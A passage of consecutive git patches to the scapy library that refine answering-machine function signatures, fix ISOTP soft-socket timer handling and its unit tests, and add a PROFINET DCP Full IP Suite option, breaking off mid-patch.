Tue, 5 Oct 2021 15:33:59 +0200 Subject: [PATCH 0666/1632] Fix answeringmachine function name --- scapy/ansmachine.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index d45e0dd480f..bcdbd7ce513 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -50,8 +50,8 @@ def __new__(cls, # type: ignore return obj -@six.add_metaclass(_Generic_metaclass) @six.add_metaclass(ReferenceAM) +@six.add_metaclass(_Generic_metaclass) class AnsweringMachine(Generic[_T]): function_name = "" filter = None # type: Optional[str] From 6d3a7ba38d8223f282bf96c9c76d4bee18f3b23a Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 5 Oct 2021 17:27:45 +0200 Subject: [PATCH 0667/1632] Inject signature in answeringmachine commands --- scapy/ansmachine.py | 15 ++++++++++++--- test/scapy/layers/dhcp.uts | 7 +++++++ tox.ini | 1 + 3 files changed, 20 insertions(+), 3 deletions(-) diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index bcdbd7ce513..411cd1aa4d0 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -37,7 +37,7 @@ _T = TypeVar("_T", Packet, PacketList) -class ReferenceAM(type): +class ReferenceAM(_Generic_metaclass): def __new__(cls, # type: ignore name, # type: str bases, # type: Tuple[type, ...] @@ -46,12 +46,21 @@ def __new__(cls, # type: ignore # type: (...) -> Type['AnsweringMachine[_T]'] obj = super(ReferenceAM, cls).__new__(cls, name, bases, dct) if obj.function_name: # type: ignore - globals()[obj.function_name] = lambda obj=obj, *args, **kargs: obj(*args, **kargs)() # type: ignore # noqa: E501 + func = lambda obj=obj, *args, **kargs: obj(*args, **kargs)() # type: ignore # noqa: E501 + # Inject signature + func.__qualname__ = obj.function_name # type: ignore + try: + import inspect + func.__signature__ = inspect.signature( # type: ignore + obj.parse_options # type: ignore + ) + except (ImportError, AttributeError): + pass + globals()[obj.function_name] = func # type: ignore return obj @six.add_metaclass(ReferenceAM) -@six.add_metaclass(_Generic_metaclass) class AnsweringMachine(Generic[_T]): function_name = "" filter = None # type: Optional[str] diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index 323d7c85208..c66526e32bb 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -78,3 +78,10 @@ assert p4[DHCP].options[0] == ("mud-url", b"https://example.org") assert DHCPOptions[33].name == "static-routes" assert DHCPOptions[46].name == "NetBIOS_node_type" assert DHCPRevOptions['static-routes'][0] == 33 + += Check that the dhcpd alias is properly defined and documented +~ python3_only + +assert dhcpd +import IPython +assert IPython.lib.pretty.pretty(dhcpd) == '' diff --git a/tox.ini b/tox.ini index 6aea6a4a8af..bbde3fa053b 100644 --- a/tox.ini +++ b/tox.ini @@ -19,6 +19,7 @@ passenv = PATH PWD PROGRAMFILES WINDIR SYSTEMROOT OPENSSL_CONF deps = mock # cryptography requirements setuptools>=18.5 + ipython cryptography coverage python-can From 602c37054c7618658b73b75335065122bb8cde7d Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 11 Oct 2021 12:40:51 +0200 Subject: [PATCH 0668/1632] Bugfix in ISOTPSoftSocket timers (#3378) * add with to TestSocket * Bugfix of ISOTPSoftSocket timers on Python 2 * Cleanup of some ISOTPSoftSocket unit tests * applied feedback * use join * remove blocking recv() calls * try to fix test * increase timeouts --- scapy/contrib/isotp/isotp_soft_socket.py | 22 +- test/contrib/automotive/interface_mockup.py | 9 + test/contrib/isotp_soft_socket.uts | 329 ++++++++++---------- 3 files changed, 193 insertions(+), 167 deletions(-) diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index e10a1b82cf8..7d55738d969 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -400,7 +400,7 @@ def _poll(): def _time(): # type: () -> float if six.PY2: - return time.clock() + return time.time() return time.monotonic() class Handle: @@ -579,8 +579,6 @@ def can_send(self, load): def on_can_recv(self, p): # type: (Packet) -> None - if not isinstance(p, CAN): - raise Scapy_Exception("argument is not a CAN frame") if p.identifier != self.dst_id: if not self.filter_warning_emitted and conf.verb >= 2: warning("You should put a filter for identifier=%x on your " @@ -621,15 +619,16 @@ def _tx_timer_handler(self): self.tx_state = ISOTP_IDLE self.tx_exception = "TX state was reset due to timeout" self.tx_done.set() - raise Scapy_Exception(self.tx_exception) + return elif self.tx_state == ISOTP_SENDING: # push out the next segmented pdu src_off = len(self.ea_hdr) max_bytes = 7 - src_off if self.tx_buf is None: + self.tx_state = ISOTP_IDLE self.tx_exception = "TX buffer is not filled" - raise Scapy_Exception(self.tx_exception) - + self.tx_done.set() + return while 1: load = self.ea_hdr load += struct.pack("B", N_PCI_CF + self.tx_sn) @@ -711,7 +710,7 @@ def _recv_fc(self, data): self.tx_state = ISOTP_IDLE self.tx_exception = "CF frame discarded because it was too short" self.tx_done.set() - raise Scapy_Exception(self.tx_exception) + return # get communication parameters only from the first FC frame if self.tx_state == ISOTP_WAIT_FIRST_FC: @@ -750,12 +749,12 @@ def _recv_fc(self, data): self.tx_state = ISOTP_IDLE self.tx_exception = "Overflow happened at the receiver side" self.tx_done.set() - raise Scapy_Exception(self.tx_exception) + return else: self.tx_state = ISOTP_IDLE self.tx_exception = "Unknown FC frame type" self.tx_done.set() - raise Scapy_Exception(self.tx_exception) + return def _recv_sf(self, data, ts): # type: (bytes, Union[float, EDecimal]) -> None @@ -861,7 +860,10 @@ def _recv_cf(self, data): return if self.rx_buf is None: - raise Scapy_Exception("rx_buf not filled with data!") + if conf.verb > 2: + warning("rx_buf not filled with data!") + self.rx_state = ISOTP_IDLE + return self.rx_sn = (self.rx_sn + 1) % 16 self.rx_buf += data[1:] diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py index 56e9a853756..0fccec430cb 100644 --- a/test/contrib/automotive/interface_mockup.py +++ b/test/contrib/automotive/interface_mockup.py @@ -239,6 +239,15 @@ def __init__(self, basecls=None): self.closed = False open_test_sockets.append(self) + def __enter__(self): + # type: () -> TestSocket + return self + + def __exit__(self, exc_type, exc_value, traceback): + # type: (Optional[Type[BaseException]], Optional[BaseException], Optional[Any]) -> None # noqa: E501 + """Close the socket""" + self.close() + def close(self): self.closed = True super(TestSocket, self).close() diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index 4fad02d9b41..7696ac88ece 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -6,7 +6,6 @@ = Imports -from scapy.modules.six.moves.queue import Queue, Empty from io import BytesIO import scapy.modules.six as six @@ -37,10 +36,11 @@ test_frames = [ (0x241, "EA 26 24 25 26 27 28" ), ] -with new_can_socket(iface0) as s, new_can_socket(iface0) as tx_sock: +with TestSocket(CAN) as s, TestSocket(CAN) as tx_sock: + s.pair(tx_sock) for f in test_frames: tx_sock.send(CAN(identifier=f[0], data=dhex(f[1]))) - sniffed = sniff(opened_socket=s, session=ISOTPSession, timeout=1, prn=lambda x: x.show2(), count=1) + sniffed = sniff(opened_socket=s, session=ISOTPSession, timeout=1, count=1) assert sniffed[0]['ISOTP'].data == bytearray(range(1, 0x29)) assert(sniffed[0]['ISOTP'].src == 0x641) @@ -50,77 +50,73 @@ assert(sniffed[0]['ISOTP'].exdst is 0xEA) + ISOTPSoftSocket tests -= Create ISOTPSoftSocket -cans = TestSocket(CAN) -stim = TestSocket(CAN) -cans.pair(stim) -s = ISOTPSoftSocket(cans, sid=0x641, did=0x241) - = Single-frame receive -stim.send(CAN(identifier=0x241, data=dhex("05 01 02 03 04 05"))) -msg = s.recv() -assert(msg.data == dhex("01 02 03 04 05")) + +with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: + cans.pair(stim) + stim.send(CAN(identifier=0x241, data=dhex("05 01 02 03 04 05"))) + msg = s.sniff(count=1, timeout=1)[0] + assert(msg.data == dhex("01 02 03 04 05")) = Single-frame send -s.send(ISOTP(dhex("01 02 03 04 05"))) -msg = stim.sniff(count=1, timeout=1)[0] -assert(msg.data == dhex("05 01 02 03 04 05")) + +with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: + cans.pair(stim) + s.send(ISOTP(dhex("01 02 03 04 05"))) + msg = stim.sniff(count=1, timeout=1)[0] + assert(msg.data == dhex("05 01 02 03 04 05")) = Two frame receive -stim.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) -c = stim.sniff(count=1, timeout=1)[0] -assert (c.data == dhex("30 00 00")) -stim.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) -msg = s.recv() -assert(msg.data == dhex("01 02 03 04 05 06 07 08 09")) +with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: + cans.pair(stim) + stim.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) + c = stim.sniff(count=1, timeout=1)[0] + assert (c.data == dhex("30 00 00")) + stim.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) + msg = s.sniff(count=1, timeout=1)[0] + assert(msg.data == dhex("01 02 03 04 05 06 07 08 09")) = 20000 bytes receive -data = dhex("01 02 03 04 05")*4000 - -cf = ISOTP(data, dst=0x241).fragment() -ff = cf.pop(0) -stim.send(ff) -c = stim.sniff(count=1, timeout=1)[0] -assert (c.data == dhex("30 00 00")) -for f in cf: - stim.send(f) -msg = s.recv() - -assert(msg.data == data) +with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: + cans.pair(stim) + data = dhex("01 02 03 04 05") * 4000 + cf = ISOTP(data, dst=0x241).fragment() + ff = cf.pop(0) + stim.send(ff) + c = stim.sniff(count=1, timeout=1)[0] + assert (c.data == dhex("30 00 00")) + for f in cf: + _ = stim.send(f) + msgs = s.sniff(count=1, timeout=30) + print(msgs) + msg = msgs[0] + assert(msg.data == data) = 20000 bytes send -data = dhex("01 02 03 04 05")*4000 -msg = ISOTP(data, dst=0x641) -ready = threading.Event() -fragments = msg.fragment() -ack = CAN(identifier=0x241, data=dhex("30 00 00")) - -def sender(): - ready.wait(timeout=5) +with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: + cans.pair(stim) + data = dhex("01 02 03 04 05")*4000 + msg = ISOTP(data, dst=0x641) + fragments = msg.fragment() + ack = CAN(identifier=0x241, data=dhex("30 00 00")) + sniffer = AsyncSniffer(opened_socket=stim, count=len(fragments), timeout=2, prn=lambda x: stim.send(ack)) + sniffer.start() s.send(msg) - -thread = threading.Thread(target=sender, name="sender") -thread.start() - -ready.set() -ff = stim.sniff(count=1, timeout=1)[0] -assert (bytes(ff) == bytes(fragments[0])) -stim.send(ack) -cfs = stim.sniff(count=len(fragments) - 1, timeout=1) -for fragment, cf in zip(fragments[1:], cfs): - assert (bytes(fragment) == bytes(cf)) - -thread.join(15) -assert not thread.is_alive() + sniffer.join(timeout=3) + cfs = sniffer.results + for fragment, cf in zip(fragments, cfs): + assert (bytes(fragment) == bytes(cf)) = Close ISOTPSoftSocket -s.close() -s = None +with TestSocket(CAN) as cans, TestSocket(CAN) as stim, ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: + cans.pair(stim) + s.close() + s = None = Create and close ISOTP soft socket with ISOTPSoftSocket(TestSocket(CAN), sid=0x641, did=0x241) as s: @@ -171,11 +167,13 @@ with ISOTPSoftSocket(cans, sid=0x641, did=0x241) as s: assert(can.data == dhex("30 00 00")) cans.close() +can_out.close() + Testing ISOTPSoftSocket with an actual CAN socket = Verify that packets are not lost if they arrive before the sniff() is called -with new_can_socket(iface0) as ss, new_can_socket0() as sr: +with TestSocket(CAN) as ss, TestSocket(CAN) as sr: + ss.pair(sr) tx_func = lambda: ss.send(CAN(identifier=0x111, data=b"\x01\x23\x45\x67")) p = sr.sniff(count=1, timeout=0.2, started_callback=tx_func) assert(len(p)==1) @@ -184,18 +182,20 @@ with new_can_socket(iface0) as ss, new_can_socket0() as sr: assert(len(p)==1) = Send single frame ISOTP message, using begin_send -with new_can_socket(iface0) as isocan, \ +with TestSocket(CAN) as isocan, \ ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, \ - new_can_socket0() as cans: + TestSocket(CAN) as cans: + cans.pair(isocan) can = cans.sniff(timeout=2, count=1, started_callback=lambda: s.begin_send(ISOTP(data=dhex("01 02 03 04 05")))) assert(can[0].identifier == 0x641) assert(can[0].data == dhex("05 01 02 03 04 05")) = Send many single frame ISOTP messages, using begin_send -with new_can_socket0() as isocan, \ +with TestSocket(CAN) as isocan, \ ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, \ - new_can_socket0() as cans: + TestSocket(CAN) as cans: + cans.pair(isocan) for i in range(100): data = dhex("01 02 03 04 05") + struct.pack("B", i) expected = struct.pack("B", len(data)) + data @@ -206,116 +206,126 @@ with new_can_socket0() as isocan, \ = Send two-frame ISOTP message, using begin_send -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - can = cans.sniff(timeout=1, count=1, started_callback=lambda: s.begin_send(ISOTP(data=dhex("01 02 03 04 05 06 07 08")))) - assert can[0].identifier == 0x641 - assert can[0].data == dhex("10 08 01 02 03 04 05 06") - can = cans.sniff(timeout=1, count=1, started_callback=lambda: cans.send(CAN(identifier = 0x241, data=dhex("30 00 00")))) - assert can[0].identifier == 0x641 - assert can[0].data == dhex("21 07 08") - -cans.close() +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: + cans.pair(isocan) + can = cans.sniff(timeout=1, count=1, started_callback=lambda: s.begin_send(ISOTP(data=dhex("01 02 03 04 05 06 07 08")))) + assert can[0].identifier == 0x641 + assert can[0].data == dhex("10 08 01 02 03 04 05 06") + can = cans.sniff(timeout=1, count=1, started_callback=lambda: cans.send(CAN(identifier = 0x241, data=dhex("30 00 00")))) + assert can[0].identifier == 0x641 + assert can[0].data == dhex("21 07 08") = Send single frame ISOTP message -with new_can_socket(iface0) as cans: - with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: - s.send(ISOTP(data=dhex("01 02 03 04 05"))) - can = cans.sniff(timeout=1, count=1) - assert(can[0].identifier == 0x641) - assert(can[0].data == dhex("05 01 02 03 04 05")) +with TestSocket(CAN) as cans, TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: + cans.pair(isocan) + s.send(ISOTP(data=dhex("01 02 03 04 05"))) + can = cans.sniff(timeout=1, count=1) + assert(can[0].identifier == 0x641) + assert(can[0].data == dhex("05 01 02 03 04 05")) = Send two-frame ISOTP message + +acks = TestSocket(CAN) + acker_ready = threading.Event() def acker(): - with new_can_socket(iface0) as acks: - acker_ready.set() - can_pkt = acks.sniff(timeout=1, count=1) - can = can_pkt[0] - acks.send(CAN(identifier = 0x241, data=dhex("30 00 00"))) + acker_ready.set() + can_pkt = acks.sniff(timeout=1, count=1) + can = can_pkt[0] + acks.send(CAN(identifier = 0x241, data=dhex("30 00 00"))) thread = Thread(target=acker) thread.start() acker_ready.wait(timeout=5) -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 00 00")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08")) +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: + cans.pair(isocan) + cans.pair(acks) + isocan.pair(acks) + s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("10 08 01 02 03 04 05 06")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x241) + assert(can.data == dhex("30 00 00")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("21 07 08")) thread.join(15) +acks.close() assert not thread.is_alive() = Send two-frame ISOTP message with bs +acks = TestSocket(CAN) acker_ready = threading.Event() def acker(): - with new_can_socket(iface0) as acks: - acker_ready.set() - can_pkt = acks.sniff(timeout=1, count=1) - acks.send(CAN(identifier = 0x241, data=dhex("30 20 00"))) + acker_ready.set() + can_pkt = acks.sniff(timeout=1, count=1) + acks.send(CAN(identifier = 0x241, data=dhex("30 20 00"))) thread = Thread(target=acker) thread.start() acker_ready.wait(timeout=5) -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 20 00")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08")) +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: + cans.pair(isocan) + cans.pair(acks) + isocan.pair(acks) + s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("10 08 01 02 03 04 05 06")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x241) + assert(can.data == dhex("30 20 00")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("21 07 08")) thread.join(15) +acks.close() assert not thread.is_alive() = Send two-frame ISOTP message with ST +acks = TestSocket(CAN) acker_ready = threading.Event() def acker(): - with new_can_socket0() as acks: - acker_ready.set() - acks.sniff(timeout=1, count=1) - acks.send(CAN(identifier = 0x241, data=dhex("30 00 10"))) + acker_ready.set() + acks.sniff(timeout=1, count=1) + acks.send(CAN(identifier = 0x241, data=dhex("30 00 10"))) thread = Thread(target=acker) thread.start() acker_ready.wait(timeout=5) -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 00 10")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08")) +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: + cans.pair(isocan) + cans.pair(acks) + isocan.pair(acks) + s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("10 08 01 02 03 04 05 06")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x241) + assert(can.data == dhex("30 00 10")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("21 07 08")) thread.join(15) +acks.close() assert not thread.is_alive() = Receive a single frame ISOTP message -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x241, data = dhex("05 01 02 03 04 05"))) - isotp = s.recv() + +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: + cans.pair(isocan) + cans.send(CAN(identifier = 0x241, data = dhex("05 01 02 03 04 05"))) + isotp = s.sniff(count=1, timeout=1)[0] assert(isotp.data == dhex("01 02 03 04 05")) assert(isotp.src == 0x641) assert(isotp.dst == 0x241) @@ -324,10 +334,11 @@ with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) = Receive a single frame ISOTP message, with extended addressing -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, extended_addr=0xc0, extended_rx_addr=0xea) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x241, data = dhex("EA 05 01 02 03 04 05"))) - isotp = s.recv() + +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, extended_addr=0xc0, extended_rx_addr=0xea) as s, TestSocket(CAN) as cans: + cans.pair(isocan) + cans.send(CAN(identifier = 0x241, data = dhex("EA 05 01 02 03 04 05"))) + isotp = s.sniff(count=1, timeout=1)[0] assert(isotp.data == dhex("01 02 03 04 05")) assert(isotp.src == 0x641) assert(isotp.dst == 0x241) @@ -466,34 +477,37 @@ ses.on_packet_received([None, None]) assert True = Receive a two-frame ISOTP message -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x241, data = dhex("10 0B 01 02 03 04 05 06"))) - cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 10 11"))) - isotp = s.recv() + +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: + cans.pair(isocan) + cans.send(CAN(identifier = 0x241, data = dhex("10 0B 01 02 03 04 05 06"))) + cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 10 11"))) + isotp = s.sniff(count=1, timeout=1)[0] assert(isotp.data == dhex("01 02 03 04 05 06 07 08 09 10 11")) = Check what happens when a CAN frame with wrong identifier gets received -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x141, data = dhex("05 01 02 03 04 05"))) + +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: + cans.pair(isocan) + cans.send(CAN(identifier = 0x141, data = dhex("05 01 02 03 04 05"))) assert(s.ins.rx_queue.empty()) + Testing ISOTPSoftSocket timeouts = Check if not sending the last CF will make the socket timeout -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x241, data = dhex("10 11 01 02 03 04 05 06"))) - cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 0A 0B 0C 0D"))) +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: + cans.pair(isocan) + cans.send(CAN(identifier = 0x241, data = dhex("10 11 01 02 03 04 05 06"))) + cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 0A 0B 0C 0D"))) isotp = s.sniff(timeout=0.1) assert(len(isotp) == 0) = Check if not sending the first CF will make the socket timeout -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x241, data = dhex("10 11 01 02 03 04 05 06"))) + +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: + cans.pair(isocan) + cans.send(CAN(identifier = 0x241, data = dhex("10 11 01 02 03 04 05 06"))) isotp = s.sniff(timeout=0.1) assert(len(isotp) == 0) @@ -502,14 +516,15 @@ assert(len(isotp) == 0) exception = None isotp = ISOTP(data=dhex("01 02 03 04 05 06 07 08 09 0A")) -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: +with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s, TestSocket(CAN) as cans: + cans.pair(isocan) try: s.send(isotp) assert(False) except Scapy_Exception as ex: exception = ex -assert(str(exception) == "TX state was reset due to timeout" or str(exception) == "ISOTP send not completed in 30s") +assert(str(exception) == "TX state was reset due to timeout") = Check if not sending the second FC will make the socket timeout exception = None @@ -867,7 +882,7 @@ with new_can_socket(iface0) as cans: with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=False) as s: with new_can_socket(iface0) as cans: cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) - res = s.recv() + res = s.sniff(count=1, timeout=1)[0] assert(res.data == dhex("05 06")) @@ -875,7 +890,7 @@ with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: with new_can_socket(iface0) as cans: cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) - res = s.recv() + res = s.sniff(count=1, timeout=1)[0] assert(res.data == dhex("05 06")) @@ -883,7 +898,7 @@ with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: with new_can_socket(iface0) as cans: cans.send(CAN(identifier=0x241, data=dhex("02 05 06"))) - res = s.recv() + res = s.sniff(count=1, timeout=1)[0] assert(res.data == dhex("05 06")) @@ -892,7 +907,7 @@ with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, with new_can_socket(iface0) as cans: cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) - res = s.recv() + res = s.sniff(count=1, timeout=1)[0] assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) @@ -901,7 +916,7 @@ with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, with new_can_socket(iface0) as cans: cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) - res = s.recv() + res = s.sniff(count=1, timeout=1)[0] res.show() assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) From 7b673d7ef4cc37917762c2b96811c2363df0de93 Mon Sep 17 00:00:00 2001 From: Chris Packham Date: Wed, 30 Jun 2021 10:40:27 +1200 Subject: [PATCH 0669/1632] contrib/pnio_dcp: Add Full IP Suite sub option The Full IP Suite suboption allows configuration of up to 4 DNS servers in addition to the ip, netmask and gateway. It is an optional part of the PROFINET standards. Signed-off-by: Chris Packham --- scapy/contrib/pnio_dcp.py | 38 +++++++++++++++++++++++++++++---- test/contrib/pnio_dcp.uts | 44 +++++++++++++++++++++++++++++++++++++++ 2 files changed, 78 insertions(+), 4 deletions(-) diff --git a/scapy/contrib/pnio_dcp.py b/scapy/contrib/pnio_dcp.py index 11c8d209e4b..f62e05d4397 100644 --- a/scapy/contrib/pnio_dcp.py +++ b/scapy/contrib/pnio_dcp.py @@ -25,6 +25,7 @@ ByteEnumField, ConditionalField, FieldLenField, + FieldListField, IPField, LenField, MACField, @@ -99,7 +100,8 @@ 0x01: { 0x00: "Reserved", 0x01: "MAC Address", - 0x02: "IP Parameter" + 0x02: "IP Parameter", + 0x03: "Full IP Suite", }, # device properties 0x02: { @@ -224,6 +226,27 @@ def extract_padding(self, s): return '', s +class DCPFullIPBlock(Packet): + fields_desc = [ + ByteEnumField("option", 1, DCP_OPTIONS), + MultiEnumField("sub_option", 3, DCP_SUBOPTIONS, fmt='B', + depends_on=lambda p: p.option), + LenField("dcp_block_length", None), + ShortEnumField("block_info", 1, IP_BLOCK_INFOS), + IPField("ip", "192.168.0.2"), + IPField("netmask", "255.255.255.0"), + IPField("gateway", "192.168.0.1"), + FieldListField("dnsaddr", [], IPField("", "0.0.0.0"), + count_from=lambda x: 4), + PadField(StrLenField("padding", b"\x00", + length_from=lambda p: p.dcp_block_length % 2), 1, + padwith=b"\x00") + ] + + def extract_padding(self, s): + return '', s + + class DCPMACBlock(Packet): fields_desc = [ ByteEnumField("option", 1, DCP_OPTIONS), @@ -612,15 +635,22 @@ class ProfinetDCP(Packet): ConditionalField(IPField("ip", "192.168.0.2"), lambda pkt: pkt.service_id == 4 and pkt.service_type == 0 and pkt.option == 1 and - pkt.sub_option == 2), + pkt.sub_option in [2, 3]), ConditionalField(IPField("netmask", "255.255.255.0"), lambda pkt: pkt.service_id == 4 and pkt.service_type == 0 and pkt.option == 1 and - pkt.sub_option == 2), + pkt.sub_option in [2, 3]), ConditionalField(IPField("gateway", "192.168.0.1"), lambda pkt: pkt.service_id == 4 and pkt.service_type == 0 and pkt.option == 1 and - pkt.sub_option == 2), + pkt.sub_option in [2, 3]), + + # Full IP + ConditionalField(FieldListField("dnsaddr", [], IPField("", "0.0.0.0"), + count_from=lambda x: 4), + lambda pkt: pkt.service_id == 4 and + pkt.service_type == 0 and pkt.option == 